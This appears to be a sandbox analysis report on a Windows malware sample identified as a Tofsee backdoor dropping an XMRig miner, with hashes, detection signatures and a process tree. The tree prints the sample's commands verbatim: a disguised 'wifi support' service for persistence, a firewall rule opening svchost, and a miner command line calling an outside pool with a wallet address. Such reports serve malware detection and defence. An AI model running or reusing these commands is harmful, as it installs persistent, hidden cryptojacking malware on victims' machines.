Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    27-09-2021 01:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe

  • Size

    154KB

  • MD5

    43821f948f1e4c990a805803a51050d6

  • SHA1

    8b3704dbf59cafc8ab33902b6990907c2bb9b99a

  • SHA256

    f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1

  • SHA512

    e31e2b2841c7f0bb749a8594b7d98f68be3e03ab2ca04ebc095fbc36b5ccfac50cbf60938aa98a18630ec5c62282052bb89564f4e2448255e88bb62eb5df19e5

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe
    "C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qzgcxqym\
      2⤵
        PID:2392
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wiuccnck.exe" C:\Windows\SysWOW64\qzgcxqym\
        2⤵
          PID:2712
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create qzgcxqym binPath= "C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe /d\"C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3536
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description qzgcxqym "wifi internet conection"
            2⤵
              PID:4024
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start qzgcxqym
              2⤵
                PID:1428
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1208
              • C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe
                C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe /d"C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1040
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:612
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3880

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\wiuccnck.exe
                MD5

                41f19a4848cb0082282a7155053e4880

                SHA1

                adbbf27ccf06027a68f407a08a8404a1ac5827db

                SHA256

                08164201c7f7be408b904058d416ed6923516c512de306de3a9018364d8facdc

                SHA512

                188d9dcae0c4a9336b661c91dfee9e317bc0f4bb0bb3dcdb57c40db7abff4cfc2d907d7a758005f1b060bd5420045c97bbfb2f6552844732f07e11fac51fcea7

                Download Submit

              • C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe
                MD5

                41f19a4848cb0082282a7155053e4880

                SHA1

                adbbf27ccf06027a68f407a08a8404a1ac5827db

                SHA256

                08164201c7f7be408b904058d416ed6923516c512de306de3a9018364d8facdc

                SHA512

                188d9dcae0c4a9336b661c91dfee9e317bc0f4bb0bb3dcdb57c40db7abff4cfc2d907d7a758005f1b060bd5420045c97bbfb2f6552844732f07e11fac51fcea7

                Download Submit

              • memory/612-125-0x0000000000530000-0x0000000000545000-memory.dmp

                Filesize

                84KB

                Download

              • memory/612-130-0x0000000000530000-0x0000000000545000-memory.dmp

                Filesize

                84KB

                Download

              • memory/612-126-0x0000000000539A6B-mapping.dmp

                Download

              • memory/1040-129-0x0000000000400000-0x00000000004AD000-memory.dmp

                Filesize

                692KB

                Download

              • memory/1208-124-0x0000000000000000-mapping.dmp

                Download

              • memory/1428-122-0x0000000000000000-mapping.dmp

                Download

              • memory/2072-117-0x0000000000400000-0x00000000004AD000-memory.dmp

                Filesize

                692KB

                Download

              • memory/2072-116-0x0000000000600000-0x0000000000613000-memory.dmp

                Filesize

                76KB

                Download

              • memory/2392-115-0x0000000000000000-mapping.dmp

                Download

              • memory/2712-118-0x0000000000000000-mapping.dmp

                Download

              • memory/3536-120-0x0000000000000000-mapping.dmp

                Download

              • memory/3880-132-0x0000000002E00000-0x0000000002EF1000-memory.dmp

                Filesize

                964KB

                Download

              • memory/3880-136-0x0000000002E9259C-mapping.dmp

                Download

              • memory/3880-137-0x0000000002E00000-0x0000000002EF1000-memory.dmp

                Filesize

                964KB

                Download

              • memory/4024-121-0x0000000000000000-mapping.dmp

                Download